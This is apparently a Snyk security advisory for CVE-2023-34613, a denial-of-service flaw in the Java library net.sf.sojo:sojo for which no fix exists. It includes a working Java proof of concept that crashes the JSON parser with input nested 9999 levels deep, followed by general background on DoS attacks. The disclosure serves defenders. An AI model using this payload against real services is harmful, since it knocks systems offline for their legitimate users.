Denial of Service (DoS) Affecting net.sf.sojo:sojo package, versions [0,]


Severity

Recommended
0.0
high
0
10

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Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.07% (32nd percentile)

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  • Snyk IDSNYK-JAVA-NETSFSOJO-5710358
  • published15 Jun 2023
  • disclosed14 Jun 2023
  • creditPoppingSnack

Introduced: 14 Jun 2023

CVE-2023-34613  (opens in a new tab)
CWE-400  (opens in a new tab)

How to fix?

There is no fixed version for net.sf.sojo:sojo.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). Exploiting this vulnerability is possible via crafted objects that have deeply nested structures, leading to stack exhaustion.

PoC

import net.sf.sojo.interchange.json.JsonParser;

public class PoC {

    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "0");


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String jsonString = TOO_DEEP_DOC;
        JsonParser parser = new JsonParser();
        parser.parse(jsonString);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

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